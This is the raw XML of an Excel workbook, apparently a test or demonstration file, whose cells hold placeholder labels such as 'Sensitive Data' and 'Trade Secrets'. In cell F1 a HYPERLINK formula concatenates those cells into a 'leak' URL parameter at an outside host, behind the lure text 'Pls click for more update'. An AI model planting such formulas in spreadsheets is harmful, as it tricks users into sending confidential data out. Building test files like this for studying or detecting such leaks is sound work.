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/Downloads/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{EFC9AB96-9749-974D-BC9E-BB68A66540A6}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="500" windowWidth="28800" windowHeight="16000" xr2:uid="{3015B8D0-0648-480B-BE57-8D3A6E59C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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
  <si>
    <t>Sensitive Data</t>
  </si>
  <si>
    <t>P11</t>
  </si>
  <si>
    <t>Trade Secrets</t>
  </si>
  <si>
    <t>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</si>
</sst>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D566-55A2-4259-B5F0-82A2B27C4DF9}">
  <dimension ref="A1:F5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22.6640625" customWidth="1"/>
    <col min="6" max="6" width="23.1640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
      <c r="F1" s="1" t="str">
        <f>HYPERLINK("http://google.com/input?leak="&amp;A2&amp;A3&amp;A4&amp;A5,"Pls click for more update")</f>
        <v>Pls click for more update</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" s="3" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" s="5" t="s">
        <v>3</v>
      </c>
    </row>
  </sheetData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4C9A52AD598149BA88F8EB4C7E1FFE" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a99e2bb2240c6b8c6e86a67e2b2f580c">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="3364e4c4-dbad-474d-93a2-f00440592fdb" xmlns:ns4="97dc9dcb-7270-4e12-b517-827f70d4903d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="38f85d2a065aa63833316d6c68b3d5b7" ns3:_="" ns4:_="">
    <xsd:import namespace="3364e4c4-dbad-474d-93a2-f00440592fdb"/>
    <xsd:import namespace="97dc9dcb-7270-4e12-b517-827f70d490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4e4c4-dbad-474d-93a2-f00440592f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c9dcb-7270-4e12-b517-827f70d490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12060-039B-40BC-B444-62EA71E48A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403599-935B-491C-892D-E0CE8592E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4e4c4-dbad-474d-93a2-f00440592fdb"/>
    <ds:schemaRef ds:uri="97dc9dcb-7270-4e12-b517-827f70d490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D240F5-908D-440E-A768-DA12A5D8FB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T, Nikesh</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-21T04:27:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-03T08:54:17Z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0x0101006A4C9A52AD598149BA88F8EB4C7E1FFE</vt:lpwstr>
  </property>
</Properties>
</file>